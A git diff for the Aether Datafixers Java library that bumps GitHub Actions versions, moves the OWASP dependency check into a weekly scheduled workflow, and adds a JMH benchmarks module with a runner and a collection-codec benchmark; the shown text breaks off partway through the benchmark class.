diff --git a/.github/workflows/ci-pr.yml b/.github/workflows/ci-pr.yml index 91961ff..340e73b 100644 --- a/.github/workflows/ci-pr.yml +++ b/.github/workflows/ci-pr.yml @@ -20,12 +20,12 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 with: fetch-depth: 1 - name: Set up JDK ${{ matrix.java }} - uses: actions/setup-java@v4 + uses: actions/setup-java@v5 with: java-version: ${{ matrix.java }} distribution: 'temurin' @@ -36,7 +36,7 @@ jobs: # Upload XMLs ONLY once (Java 21) so the report doesn't double-count - name: Upload unit test XMLs (Java 21 only) - uses: actions/upload-artifact@v4 + uses: actions/upload-artifact@v6 if: always() && matrix.java == '21' with: name: unit-xml @@ -56,12 +56,12 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 with: fetch-depth: 1 - name: Set up JDK ${{ matrix.java }} - uses: actions/setup-java@v4 + uses: actions/setup-java@v5 with: java-version: ${{ matrix.java }} distribution: 'temurin' @@ -72,7 +72,7 @@ jobs: # Upload XMLs ONLY once (Java 21) so the report doesn't double-count - name: Upload IT test XMLs (Java 21 only) - uses: actions/upload-artifact@v4 + uses: actions/upload-artifact@v6 if: always() && matrix.java == '21' with: name: it-xml @@ -87,12 +87,12 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 with: fetch-depth: 1 - name: Set up JDK 21 - uses: actions/setup-java@v4 + uses: actions/setup-java@v5 with: java-version: '21' distribution: 'temurin' @@ -107,35 +107,6 @@ jobs: - name: Run Checkstyle analysis run: mvn -B checkstyle:check -Pqa -Ddependency-check.skip=true - dependency-check: - name: OWASP Dependency Check - runs-on: ubuntu-latest - needs: build - env: - NVD_API_KEY: ${{ secrets.NVD_API_KEY }} - - steps: - - name: Checkout repository - uses: actions/checkout@v4 - - - name: Set up JDK 21 - uses: actions/setup-java@v4 - with: - java-version: '21' - distribution: 'temurin' - cache: 'maven' - - - name: Cache Dependency-Check DB - uses: actions/cache@v4 - with: - path: ~/.m2/repository/org/owasp/dependency-check-data - key: depcheck-${{ runner.os }}-${{ hashFiles('**/pom.xml') }} - restore-keys: | - depcheck-${{ runner.os }}- - - - name: Run OWASP Dependency Check - run: mvn -B dependency-check:aggregate -Pqa - reports: name: Test Reports runs-on: ubuntu-latest @@ -149,26 +120,26 @@ jobs: steps: - name: Download unit XMLs (Java 21 only) - uses: actions/download-artifact@v4 + uses: actions/download-artifact@v7 with: name: unit-xml path: reports/unit - name: Download IT XMLs (Java 21 only) - uses: actions/download-artifact@v4 + uses: actions/download-artifact@v7 with: name: it-xml path: reports/it - name: Publish Unit Test Report - uses: mikepenz/action-junit-report@v4 + uses: mikepenz/action-junit-report@v6 if: always() with: report_paths: 'reports/unit/**/TEST-*.xml' check_name: Unit Test Report - name: Publish IT Test Report - uses: mikepenz/action-junit-report@v4 + uses: mikepenz/action-junit-report@v6 if: always() with: report_paths: 'reports/it/**/TEST-*.xml' diff --git a/.github/workflows/ci-push.yml b/.github/workflows/ci-push.yml index ddd4e2a..a55ab3e 100644 --- a/.github/workflows/ci-push.yml +++ b/.github/workflows/ci-push.yml @@ -19,12 +19,12 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 with: fetch-depth: 1 - name: Set up JDK ${{ matrix.java }} - uses: actions/setup-java@v4 + uses: actions/setup-java@v5 with: java-version: ${{ 
matrix.java }} distribution: 'temurin' @@ -34,7 +34,7 @@ jobs: run: mvn -B clean verify -Pqa -Ddependency-check.skip=true - name: Upload unit test XMLs - uses: actions/upload-artifact@v4 + uses: actions/upload-artifact@v6 if: always() with: name: unit-xml-java-${{ matrix.java }} @@ -55,14 +55,14 @@ jobs: steps: - name: Download unit XMLs (all Java versions) - uses: actions/download-artifact@v4 + uses: actions/download-artifact@v7 with: pattern: unit-xml-java-* merge-multiple: true path: reports/unit - name: Publish Unit Test Report - uses: mikepenz/action-junit-report@v4 + uses: mikepenz/action-junit-report@v6 if: always() with: report_paths: 'reports/unit/**/TEST-*.xml' diff --git a/.github/workflows/codeql.yml b/.github/workflows/codeql.yml index 5233757..da7d0dd 100644 --- a/.github/workflows/codeql.yml +++ b/.github/workflows/codeql.yml @@ -20,19 +20,19 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 with: fetch-depth: 1 - name: Set up JDK 21 - uses: actions/setup-java@v4 + uses: actions/setup-java@v5 with: java-version: '21' distribution: 'temurin' cache: 'maven' - name: Initialize CodeQL - uses: github/codeql-action/init@v3 + uses: github/codeql-action/init@v4 with: languages: java-kotlin build-mode: manual @@ -42,6 +42,6 @@ jobs: run: mvn -B clean compile -DskipTests - name: Perform CodeQL Analysis - uses: github/codeql-action/analyze@v3 + uses: github/codeql-action/analyze@v4 with: category: "/language:java-kotlin" diff --git a/.github/workflows/dependabot-retarget-to-develop.yml b/.github/workflows/dependabot-retarget-to-develop.yml index ef0d89d..d6df9d6 100644 --- a/.github/workflows/dependabot-retarget-to-develop.yml +++ b/.github/workflows/dependabot-retarget-to-develop.yml @@ -16,7 +16,7 @@ jobs: runs-on: ubuntu-latest steps: - name: Change base branch to develop - uses: actions/github-script@v7 + uses: actions/github-script@v8 with: script: | const pr = context.payload.pull_request; diff --git a/.github/workflows/dependency-review.yml b/.github/workflows/dependency-review.yml index 1dbab60..67b6c0f 100644 --- a/.github/workflows/dependency-review.yml +++ b/.github/workflows/dependency-review.yml @@ -15,7 +15,7 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 with: fetch-depth: 1 diff --git a/.github/workflows/owasp-dependency-check.yml b/.github/workflows/owasp-dependency-check.yml new file mode 100644 index 0000000..a821a57 --- /dev/null +++ b/.github/workflows/owasp-dependency-check.yml @@ -0,0 +1,48 @@ +name: OWASP Dependency Check + +on: + schedule: + # Runs every Sunday at 3:00 AM UTC + - cron: '0 3 * * 0' + workflow_dispatch: + +permissions: + contents: read + security-events: write + +jobs: + dependency-check: + name: OWASP Dependency Check + runs-on: ubuntu-latest + env: + NVD_API_KEY: ${{ secrets.NVD_API_KEY }} + + steps: + - name: Checkout repository + uses: actions/checkout@v6 + + - name: Set up JDK 21 + uses: actions/setup-java@v5 + with: + java-version: '21' + distribution: 'temurin' + cache: 'maven' + + - name: Cache Dependency-Check DB + uses: actions/cache@v5 + with: + path: ~/.m2/repository/org/owasp/dependency-check-data + key: depcheck-${{ runner.os }}-${{ hashFiles('**/pom.xml') }} + restore-keys: | + depcheck-${{ runner.os }}- + + - name: Run OWASP Dependency Check + run: mvn -B dependency-check:aggregate -Pqa + + - name: Upload Dependency Check Report + uses: actions/upload-artifact@v6 + if: always() + with: + name: dependency-check-report + path: 
target/dependency-check-report.html + retention-days: 30 diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml index 8867b33..2140a2a 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release.yml @@ -33,7 +33,7 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 with: fetch-depth: 0 @@ -65,7 +65,7 @@ jobs: fi - name: Set up JDK ${{ env.JAVA_VERSION }} - uses: actions/setup-java@v4 + uses: actions/setup-java@v5 with: java-version: ${{ env.JAVA_VERSION }} distribution: 'temurin' @@ -85,10 +85,10 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 - name: Set up JDK ${{ matrix.java }} - uses: actions/setup-java@v4 + uses: actions/setup-java@v5 with: java-version: ${{ matrix.java }} distribution: 'temurin' @@ -105,10 +105,10 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 - name: Set up JDK ${{ env.JAVA_VERSION }} - uses: actions/setup-java@v4 + uses: actions/setup-java@v5 env: CENTRAL_USERNAME: ${{ secrets.CENTRAL_USERNAME }} CENTRAL_TOKEN: ${{ secrets.CENTRAL_TOKEN }} @@ -137,10 +137,10 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 - name: Set up JDK ${{ env.JAVA_VERSION }} - uses: actions/setup-java@v4 + uses: actions/setup-java@v5 with: java-version: ${{ env.JAVA_VERSION }} distribution: 'temurin' @@ -150,7 +150,7 @@ jobs: run: mvn -B cyclonedx:makeAggregateBom -Pqa - name: Upload SBOM artifact - uses: actions/upload-artifact@v4 + uses: actions/upload-artifact@v6 with: name: sbom path: target/bom.* @@ -168,10 +168,10 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 - name: Download SBOM - uses: actions/download-artifact@v4 + uses: actions/download-artifact@v7 with: name: sbom path: sbom/ diff --git a/.gitignore b/.gitignore index 5232b33..dcc6e4a 100644 --- a/.gitignore +++ b/.gitignore @@ -50,3 +50,6 @@ bin/ # Claude Code /.claude/ /CLAUDE.md + +# GitHub +current-ticket.md \ No newline at end of file diff --git a/aether-datafixers-api/pom.xml b/aether-datafixers-api/pom.xml index 1322745..eb56948 100644 --- a/aether-datafixers-api/pom.xml +++ b/aether-datafixers-api/pom.xml @@ -6,7 +6,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-api diff --git a/aether-datafixers-benchmarks/pom.xml b/aether-datafixers-benchmarks/pom.xml new file mode 100644 index 0000000..ef8e7ba --- /dev/null +++ b/aether-datafixers-benchmarks/pom.xml @@ -0,0 +1,174 @@ + + + 4.0.0 + + + de.splatgames.aether.datafixers + aether-datafixers + 1.0.0-SNAPSHOT + + + aether-datafixers-benchmarks + jar + + Aether Datafixers :: Benchmarks + JMH microbenchmarks for Aether Datafixers performance analysis. 
+ + + + true + true + + true + + de.splatgames.aether.datafixers.benchmarks.BenchmarkRunner + + + + + + de.splatgames.aether.datafixers + aether-datafixers-api + + + de.splatgames.aether.datafixers + aether-datafixers-core + + + de.splatgames.aether.datafixers + aether-datafixers-codec + + + de.splatgames.aether.datafixers + aether-datafixers-testkit + + + + + org.openjdk.jmh + jmh-core + + + org.openjdk.jmh + jmh-generator-annprocess + provided + + + + + com.google.code.gson + gson + + + com.fasterxml.jackson.core + jackson-databind + + + + + org.yaml + snakeyaml + + + com.fasterxml.jackson.dataformat + jackson-dataformat-yaml + + + + + com.fasterxml.jackson.dataformat + jackson-dataformat-toml + + + + + com.fasterxml.jackson.dataformat + jackson-dataformat-xml + + + + + com.google.guava + guava + + + + + org.jetbrains + annotations + + + + + + + + org.apache.maven.plugins + maven-compiler-plugin + + + + org.openjdk.jmh + jmh-generator-annprocess + ${jmh.version} + + + + + + org.apache.maven.plugins + maven-enforcer-plugin + + + + + org.apache.maven.plugins + maven-shade-plugin + ${plugin.shade.version} + + + package + + shade + + + + + org.openjdk.jmh.Main + + + + + + + *:* + + META-INF/*.SF + META-INF/*.DSA + META-INF/*.RSA + META-INF/MANIFEST.MF + + + + false + true + benchmarks + + + + + + + + org.codehaus.mojo + exec-maven-plugin + 3.1.0 + + ${main.class} + + + + + diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java new file mode 100644 index 0000000..beb5766 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java @@ -0,0 +1,341 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks; + +import org.openjdk.jmh.runner.Runner; +import org.openjdk.jmh.runner.RunnerException; +import org.openjdk.jmh.runner.options.Options; +import org.openjdk.jmh.runner.options.OptionsBuilder; + +import java.io.IOException; + +/** + * Main entry point for running Aether Datafixers JMH benchmarks. + * + *

This class provides both a command-line interface and a programmatic API for executing benchmarks. It supports all standard JMH options while providing convenient preset configurations for common benchmark scenarios.

+ * + *

Execution Methods

+ * + *

Via Maven exec:java (Development)

+ *

A quick way to run benchmarks during development without building a JAR:

+ *
{@code
+ * # Run all benchmarks with default settings
+ * mvn exec:java -pl aether-datafixers-benchmarks
+ *
+ * # Run with JMH arguments
+ * mvn exec:java -pl aether-datafixers-benchmarks -Dexec.args="-h"
+ *
+ * # Run specific benchmark pattern
+ * mvn exec:java -pl aether-datafixers-benchmarks -Dexec.args="SingleFixBenchmark"
+ * }
+ * + *

Via Fat JAR (Production)

+ *

Recommended for production benchmark runs with full JMH isolation:

+ *
{@code
+ * # Build the fat JAR
+ * mvn clean package -pl aether-datafixers-benchmarks -DskipTests
+ *
+ * # Run all benchmarks
+ * java -jar aether-datafixers-benchmarks/target/aether-datafixers-benchmarks-*-benchmarks.jar
+ *
+ * # Run specific benchmark
+ * java -jar target/*-benchmarks.jar SingleFixBenchmark
+ *
+ * # Run with custom parameters
+ * java -jar target/*-benchmarks.jar -p payloadSize=LARGE -wi 3 -i 5 -f 1
+ *
+ * # Output JSON results for analysis
+ * java -jar target/*-benchmarks.jar -rf json -rff results.json
+ *
+ * # List all available benchmarks
+ * java -jar target/*-benchmarks.jar -l
+ *
+ * # Profile with async-profiler
+ * java -jar target/*-benchmarks.jar -prof async:output=flamegraph
+ * }
+ * + *

Available Benchmark Categories

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
Category   | Benchmarks                                                           | Focus
Core       | SingleFixBenchmark, MultiFixChainBenchmark, SchemaLookupBenchmark    | DataFixer migration performance
Format     | JsonBenchmark, YamlBenchmark, TomlXmlBenchmark, CrossFormatBenchmark | DynamicOps format comparisons
Codec      | PrimitiveCodecBenchmark, CollectionCodecBenchmark                    | Serialization/deserialization
Concurrent | ConcurrentMigrationBenchmark                                         | Thread-safety and scalability
+ * + *

Programmatic API

+ *

For integration with test frameworks or custom tooling:

+ *
{@code
+ * // Run all benchmarks
+ * BenchmarkRunner.runAllBenchmarks();
+ *
+ * // Run quick validation (CI/CD)
+ * BenchmarkRunner.runQuickBenchmarks();
+ *
+ * // Run only core benchmarks
+ * BenchmarkRunner.runCoreBenchmarks();
+ *
+ * // Run only format benchmarks
+ * BenchmarkRunner.runFormatBenchmarks();
+ * }
+ * + *

Default Configuration

+ * + * + * + * + * + * + *
Setting                | Default | Quick Mode
Warmup iterations      | 5       | 2
Measurement iterations | 10      | 3
Forks                  | 2       | 1
JVM heap               | 2 GB    | 1 GB
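For reference, a minimal sketch of how the "Default" column maps onto JMH's programmatic API; it mirrors the {@code OptionsBuilder} calls that {@link #runAllBenchmarks()} makes below, and the class wrapper is illustrative only:

{@code
import org.openjdk.jmh.runner.Runner;
import org.openjdk.jmh.runner.RunnerException;
import org.openjdk.jmh.runner.options.Options;
import org.openjdk.jmh.runner.options.OptionsBuilder;

public final class DefaultRunSketch {
    public static void main(final String[] args) throws RunnerException {
        final Options options = new OptionsBuilder()
                .include("de\\.splatgames\\.aether\\.datafixers\\.benchmarks\\..*")
                .warmupIterations(5)          // "Default" column
                .measurementIterations(10)
                .forks(2)
                .jvmArgs("-Xms2G", "-Xmx2G")  // 2 GB heap
                .build();
        new Runner(options).run();
    }
}
}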
+ * + *

Common JMH Options

+ * + * + * + * + * + * + * + * + * + * + * + *
Option        | Description            | Example
{@code -wi}   | Warmup iterations      | {@code -wi 3}
{@code -i}    | Measurement iterations | {@code -i 5}
{@code -f}    | Number of forks        | {@code -f 1}
{@code -p}    | Parameter value        | {@code -p payloadSize=SMALL}
{@code -t}    | Thread count           | {@code -t 4}
{@code -rf}   | Result format          | {@code -rf json}
{@code -rff}  | Result file            | {@code -rff results.json}
{@code -l}    | List benchmarks        | {@code -l}
{@code -prof} | Profiler               | {@code -prof gc}
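These flags can also be parsed programmatically; a small sketch using JMH's standard {@code CommandLineOptions} parser (shown for illustration, not part of this class):

{@code
import org.openjdk.jmh.runner.Runner;
import org.openjdk.jmh.runner.options.CommandLineOptions;

// CommandLineOptions accepts the same flags as the CLI and throws
// CommandLineOptionException on malformed input
final CommandLineOptions opts = new CommandLineOptions("-wi", "3", "-i", "5", "-f", "1", "-rf", "json");
new Runner(opts).run();
}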
+ * + * @author Erik Pförtner + * @see de.splatgames.aether.datafixers.benchmarks.core + * @see de.splatgames.aether.datafixers.benchmarks.codec + * @see de.splatgames.aether.datafixers.benchmarks.concurrent + * @since 1.0.0 + */ +public final class BenchmarkRunner { + + /** + * Private constructor to prevent instantiation. + */ + private BenchmarkRunner() { + // Main class + } + + /** + * Main entry point for running benchmarks from the command line. + * + *

Behavior depends on whether arguments are provided:

• With arguments: all arguments are passed straight through to the standard JMH launcher, {@code org.openjdk.jmh.Main}
• Without arguments: {@link #runAllBenchmarks()} is executed with the default configuration

Exit Codes

With arguments, the process exit status is whatever the delegated JMH launcher produces; without arguments, failures surface as a thrown {@link RunnerException}.
+ * + * + * @param args command-line arguments (passed directly to JMH if present) + * @throws RunnerException if benchmark execution fails + * @throws IOException if there is an I/O error reading benchmark metadata + */ + public static void main(final String[] args) throws RunnerException, IOException { + if (args.length > 0) { + // If arguments are provided, delegate to JMH main + org.openjdk.jmh.Main.main(args); + } else { + // Run with default options + runAllBenchmarks(); + } + } + + /** + * Runs all benchmarks in the benchmarks package with default configuration. + * + *

Executes every benchmark class in {@code de.splatgames.aether.datafixers.benchmarks.*} with production-quality settings suitable for reliable performance measurements.

Configuration

• Warmup: 5 iterations
• Measurement: 10 iterations
• Forks: 2
• JVM heap: 2 GB ({@code -Xms2G -Xmx2G})

Note: Running all benchmarks can take significant time depending on the number of parameter combinations. Consider using {@link #runQuickBenchmarks()} for validation or {@link #runCoreBenchmarks()} for focused testing.

+ * + * @throws RunnerException if benchmark execution fails + * @see #runQuickBenchmarks() + * @see #runCoreBenchmarks() + */ + public static void runAllBenchmarks() throws RunnerException { + final Options options = new OptionsBuilder() + .include("de\\.splatgames\\.aether\\.datafixers\\.benchmarks\\..*") + .warmupIterations(5) + .measurementIterations(10) + .forks(2) + .jvmArgs("-Xms2G", "-Xmx2G") + .build(); + + new Runner(options).run(); + } + + /** + * Runs a quick subset of benchmarks for fast validation. + * + *

Executes only the {@code SingleFixBenchmark} with minimal iterations, suitable for:

• Smoke-testing the benchmark setup locally
• Quick validation in CI/CD pipelines

Configuration

• Warmup: 2 iterations
• Measurement: 3 iterations
• Forks: 1
• JVM heap: 1 GB ({@code -Xms1G -Xmx1G})
• Fixed parameter: {@code payloadSize=SMALL}

Warning: Results from quick benchmarks should not be used for performance comparisons due to reduced statistical rigor.

+ * + * @throws RunnerException if benchmark execution fails + * @see #runAllBenchmarks() + */ + public static void runQuickBenchmarks() throws RunnerException { + final Options options = new OptionsBuilder() + .include("de\\.splatgames\\.aether\\.datafixers\\.benchmarks\\.core\\.SingleFixBenchmark") + .warmupIterations(2) + .measurementIterations(3) + .forks(1) + .jvmArgs("-Xms1G", "-Xmx1G") + .param("payloadSize", "SMALL") + .build(); + + new Runner(options).run(); + } + + /** + * Runs only the core migration benchmarks. + * + *

Executes benchmarks in the {@code core} package that measure DataFixer migration performance:

• SingleFixBenchmark
• MultiFixChainBenchmark
• SchemaLookupBenchmark

Configuration

• Warmup: 5 iterations, Measurement: 10 iterations, Forks: 2, JVM heap: 2 GB

Use this method when focusing on migration performance without format-specific or codec overhead considerations.

+ * + * @throws RunnerException if benchmark execution fails + * @see #runFormatBenchmarks() + * @see #runAllBenchmarks() + */ + public static void runCoreBenchmarks() throws RunnerException { + final Options options = new OptionsBuilder() + .include("de\\.splatgames\\.aether\\.datafixers\\.benchmarks\\.core\\..*") + .warmupIterations(5) + .measurementIterations(10) + .forks(2) + .jvmArgs("-Xms2G", "-Xmx2G") + .build(); + + new Runner(options).run(); + } + + /** + * Runs only the format comparison benchmarks. + * + *

Executes benchmarks in the {@code format} package that compare different DynamicOps implementations:

• JsonBenchmark
• YamlBenchmark
• TomlXmlBenchmark
• CrossFormatBenchmark

Configuration

• Warmup: 5 iterations, Measurement: 10 iterations, Forks: 2, JVM heap: 2 GB

Use this method when evaluating which DynamicOps implementation to use for a specific use case, or when optimizing format handling.

+ * + * @throws RunnerException if benchmark execution fails + * @see #runCoreBenchmarks() + * @see #runAllBenchmarks() + */ + public static void runFormatBenchmarks() throws RunnerException { + final Options options = new OptionsBuilder() + .include("de\\.splatgames\\.aether\\.datafixers\\.benchmarks\\.format\\..*") + .warmupIterations(5) + .measurementIterations(10) + .forks(2) + .jvmArgs("-Xms2G", "-Xmx2G") + .build(); + + new Runner(options).run(); + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java new file mode 100644 index 0000000..56405aa --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java @@ -0,0 +1,406 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.codec; + +import com.google.gson.JsonElement; +import de.splatgames.aether.datafixers.api.codec.Codec; +import de.splatgames.aether.datafixers.api.codec.Codecs; +import de.splatgames.aether.datafixers.api.result.DataResult; +import de.splatgames.aether.datafixers.api.util.Pair; +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Param; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.ArrayList; +import java.util.List; +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark for collection codec encode/decode performance. + * + *

Measures the performance of list codec operations with parameterized collection sizes. These benchmarks reveal how codec performance scales with data volume and help identify potential bottlenecks in collection traversal and element processing.

+ * + *

Benchmark Categories

+ * + *

String List Benchmarks

+ *

Measure {@code List<String>} codec operations:

• {@link #encodeStringList} / {@link #decodeStringList}
• {@link #roundTripStringListDirect} / {@link #roundTripStringListFunctional}

+ * + * + *

Integer List Benchmarks

+ *

Measure {@code List<Integer>} codec operations:

• {@link #encodeIntList} / {@link #decodeIntList}
• {@link #roundTripIntListDirect} / {@link #roundTripIntListFunctional}

+ * + * + *

Parameters

+ * + * + * + *
Parameter | Values        | Description
listSize  | 10, 100, 1000 | Number of elements in the test list
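The parameter can likewise be set or swept programmatically; a minimal sketch using the same {@code OptionsBuilder.param} call that {@code BenchmarkRunner.runQuickBenchmarks()} relies on (the include pattern is illustrative):

{@code
final Options options = new OptionsBuilder()
        .include("CollectionCodecBenchmark")
        .param("listSize", "10", "1000")   // sweep two of the three sizes
        .build();
new Runner(options).run();
}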
+ * + *

Benchmark Configuration

+ * + * + * + * + * + * + * + *
Setting     | Value
Warmup      | 5 iterations, 1 second each
Measurement | 10 iterations, 1 second each
Forks       | 2 (for JIT variance mitigation)
JVM Heap    | 2 GB min/max
Time Unit   | Microseconds (appropriate for collection operations)
+ * + *

Test Data Generation

+ * + * + * + * + *
Collection   | Element Pattern         | Example (size=3)
String List  | {@code "item-" + index} | ["item-0", "item-1", "item-2"]
Integer List | {@code index}           | [0, 1, 2]
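A self-contained sketch of the codec composition these lists exercise, built from the same API the setup method uses:

{@code
final Codec<List<String>> codec = Codecs.list(Codecs.STRING);
final List<String> data = List.of("item-0", "item-1", "item-2");   // the size=3 example above
final JsonElement encoded = codec.encodeStart(GsonOps.INSTANCE, data).result().orElseThrow();
final Pair<List<String>, JsonElement> decoded = codec.decode(GsonOps.INSTANCE, encoded).result().orElseThrow();
}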
+ * + *

Interpreting Results

+ * + * + *

Usage

+ *
{@code
+ * # Run all collection codec benchmarks
+ * java -jar benchmarks.jar CollectionCodecBenchmark
+ *
+ * # Run with specific list size
+ * java -jar benchmarks.jar CollectionCodecBenchmark -p listSize=1000
+ *
+ * # Run only string list benchmarks
+ * java -jar benchmarks.jar "CollectionCodecBenchmark.*String.*"
+ *
+ * # Run only encode benchmarks
+ * java -jar benchmarks.jar "CollectionCodecBenchmark.encode.*"
+ *
+ * # Compare direct vs functional round-trip
+ * java -jar benchmarks.jar "CollectionCodecBenchmark.roundTrip.*"
+ *
+ * # Quick validation run
+ * java -jar benchmarks.jar CollectionCodecBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Generate JSON report for analysis
+ * java -jar benchmarks.jar CollectionCodecBenchmark -rf json -rff collection_results.json
+ * }
+ * + * @author Erik Pförtner + * @see PrimitiveCodecBenchmark + * @see de.splatgames.aether.datafixers.api.codec.Codecs#list(Codec) + * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.MICROSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class CollectionCodecBenchmark { + + /** + * The number of elements in test lists, injected by JMH. + * + *

This parameter controls the size of both string and integer lists. Different sizes reveal scaling characteristics of the list codec:

+ * + */ + @Param({"10", "100", "1000"}) + private int listSize; + + /** + * The DynamicOps implementation used for all codec operations. + * + *

GsonOps is used as the reference JSON implementation for benchmarks.

+ */ + private GsonOps ops; + + /** + * Codec for encoding/decoding {@code List}. + * + *

Created via {@link Codecs#list(Codec)} wrapping {@link Codecs#STRING}.

+ */ + private Codec> stringListCodec; + + /** + * Codec for encoding/decoding {@code List}. + * + *

Created via {@link Codecs#list(Codec)} wrapping {@link Codecs#INT}.

+ */ + private Codec> intListCodec; + + /** + * Test string list populated with {@link #listSize} elements. + * + *

Elements follow the pattern "item-0", "item-1", ..., "item-(n-1)".

+ */ + private List stringList; + + /** + * Test integer list populated with {@link #listSize} elements. + * + *

Elements are sequential integers: 0, 1, 2, ..., (n-1).

+ */ + private List intList; + + /** + * Pre-encoded JSON array for string list decode benchmarks. + * + *

Created during setup to isolate decode performance from encoding overhead.

+ */ + private JsonElement encodedStringList; + + /** + * Pre-encoded JSON array for integer list decode benchmarks. + * + *

Created during setup to isolate decode performance from encoding overhead.

+ */ + private JsonElement encodedIntList; + + /** + * Initializes codecs, test data, and pre-encoded JSON elements. + * + *

This setup method:

+ *
    + *
1. Creates list codecs by composing primitive codecs with {@link Codecs#list(Codec)}
2. Populates test lists with {@link #listSize} elements each
3. Pre-encodes both lists to JSON for decode benchmark isolation
+ * + *

Using {@link ArrayList} with pre-sized capacity avoids resizing overhead during population.

+ */ + @Setup(Level.Trial) + public void setup() { + this.ops = GsonOps.INSTANCE; + + this.stringListCodec = Codecs.list(Codecs.STRING); + this.intListCodec = Codecs.list(Codecs.INT); + + this.stringList = new ArrayList<>(this.listSize); + this.intList = new ArrayList<>(this.listSize); + + for (int i = 0; i < this.listSize; i++) { + this.stringList.add("item-" + i); + this.intList.add(i); + } + + this.encodedStringList = this.stringListCodec.encodeStart(this.ops, this.stringList) + .result().orElseThrow(); + this.encodedIntList = this.intListCodec.encodeStart(this.ops, this.intList) + .result().orElseThrow(); + } + + // ==================== String List Benchmarks ==================== + + /** + * Benchmarks string list encoding to JSON array. + * + *

